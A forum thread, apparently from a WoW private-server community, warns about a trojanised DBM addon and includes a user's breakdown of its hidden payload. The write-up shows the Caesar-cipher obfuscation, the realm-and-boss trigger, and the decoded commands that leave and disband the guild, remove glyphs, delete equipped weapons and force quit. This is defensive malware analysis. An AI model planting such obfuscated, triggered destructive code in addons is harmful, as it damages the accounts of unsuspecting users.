Content of this thread has been removed. If you have installed the addon contained previously in this post, remove it immediately. It contains malicious code designed to harm your WoW characters.
- Proterean
Printable View
Content of this thread has been removed. If you have installed the addon contained previously in this post, remove it immediately. It contains malicious code designed to harm your WoW characters.
- Proterean
Content of this thread has been removed. If you have installed the addon contained previously in this post, remove it immediately. It contains malicious code designed to harm your WoW characters. The author of this addon will be extensively punished by permanent ban on all of his accounts.
The addon will attempt to delete your gear, glyphs, disband your guild and leave the party mid-fight. This code is triggered only when playing on Frostmourne and a certain boss in Ulduar is engaged.
We have rendered the addon unusable in-game.
What about side effects. Could it be that the modified version of the addon introduced malicious code somewhere else?
Addons are sandboxed, they cannot do anything outside of the WoW client.
Would it be alright to post a fixed version removing the malicious bits?
Little write-up on the Frostmourne DBM addon explaining the "how" for those interested.
tldr:
Yes - the boss was Algalon, where entering Big Bang Phase would make you leave party, leave guild, disband it if possible, remove glyphs (xd!), delete wep and offhand (slots 16&18) and finally force quit the game (bypassing the 20sec countdown).
Deinstall this addon version and youre good to go.
long:
Comparing the changes made to the default 3.3.5a DBM version quickly hints at the seeming effort to "fix" a phasing related issue at Algalon when in Big Bang "room" in DBM-Ulduar/Algalon.lua .
https://i.imgur.com/P4nCfhc.jpg
Looking at the DBM-Core.lua -file theres an added check if the player is phased.
https://i.imgur.com/8Y0UwWf.jpg
The function isInPhase calls CacheData, which itself calls another two functions.
The RunScript function here(without having to look at the input) is a huge red flag and heavilly suggests maliciousness, as most addons just Get/Set/Hook event or update handlers.
https://i.imgur.com/pb4Z6ob.jpg
The first called function is GetMemoryLocations(), second Map().
CacheData checks if the RealmName equals to (obfuscated) "Frostmourne", and calling the two aforementioned functions under that condition.
Let's now dive into the obfuscated part:
DBM:Map("irvysqxwsvJ", 11, data)
"irvysqxwsvJ" gets handled by Map using the amount of characters (being the functions second input, here: v=11) and data
https://i.imgur.com/aGT5Wyo.jpg
out = out..string.char(tonumber(string.byte(k,-l))-o)
This part reverses the string by (for-)looping through "irvysqxwsvJ" from the last entry to the first entry.
v = 11
l = -v
for l = -v, -1
for l = -11, -1 do ... end [equiv: for (int i=0; i>-11; i--) ]
string.byte(k,-l) then takes the 11th (last) char of the string k in the first loop, here: J
then:
J (here: index -l of input k) gets turned into its ASCII representative 74, then for the time being a number (tonumber) it gets subtracted by 4 ("-o" with o being data=4) equaling to 70 in ASCII, which then gets turned back into a (string.char) letter again: F.
The loop then goes to the 10th entry string.byte(k,-l-1) and does the same, and so on..
in general:
Whole strings shifted by a static integer essentially describes the Caesar Cipher. Putting the whole (now reversed) string "Jvswxqsyvri" into a decoder with offset 4, we get "Frostmourne".
https://i.imgur.com/rDMxSQe.jpg
Now we can simply put all the by GetMemoryLocations() called string literals into the decoder as well.
https://i.imgur.com/1gzJdge.jpg
which then equals to:
GuildLeave
GuildDisband
for i=1,6 do RemoveGlyphFromSocket(i) end
for P=16,18 do PickupInventoryItem(P) DeleteCursorItem() end
LeaveParty
ForceQuit
CLARIFICATIONS
______________
The function(s) ONLY get called when at Algalon and in bigbang phase. (when playing on Frostmourne)
Deleting this dbm version is enough, no need for a fresh install or other panic moves of sort.
If proficient enough, just delete the adjusted Algalon and phasing parts and you're good to go.
___
props to (guessing) midna for finding that; i just broke it down for those interested
Good stuff. Thanks for the awesome write up, but as I'm sure many people will probably be asking, and looking for, do you think you can make said version without the malicious coding?
Edit: On second thought it'd be pretty great if BlueAo could look into making a version for his improved + enhanced warmane thread http://forum.warmane.com/showthread.php?t=412904 or something similar.
Appreciate the time people spent catching this before it caused any true damage though.
Mad props to the guy who thought "Hmmm, a new addon? Better check it out if there is anything funky aboot..."
Correct.
Great breakdown!
It wasnt me who initially found it actually, I merely de-obfuscated and confirmed the case, much like you did.
The original repository got deleted pretty quickly by the owner after we noticed what was going on.
I hope this is a reminder to everyone to not just install anything you find on the internet onto your computer. Even if its just something seemingly harmless like an add-on for a game.
I haven't downloaded this addon, but I would like to say this - big thanks for the warning. To all of you, in fact. It's kinda frightening how a seemingly harmless addon, that offers QoL features, could contain a malicious code and catch someone offguard. I would like to ask a question - how was the malicious code found? Did a random user checked the code and decided to contact the staff or does the staff check usermade addons, that are shared on the site?
Great advice!
[edit] I have to admit, that OP had a sense of humor. I am not defending them nor I am saying, that I find it funny, but it's fitting - imagine playing against Algalon and Big Bang occurs. All of a sudden, your game closes - you probably see a black screen before going to the desktop - you log back in and find yourself without a guild, gear and glyphs. The realisation of how screwed you got would have hit you like a "big bang". The "joke" breaks the fourth wall, if you think about it. What a twisted prank that would have been!
Respect to the dev who found it!
Might be unrelated, but today when raiding I couldn't see any /rw text on the middle of my screen, and all DBM (not this guy's...) text were entirely black, does this have to do with it? And how do I fix it? Already reopened game, cleared cache, nothing solves it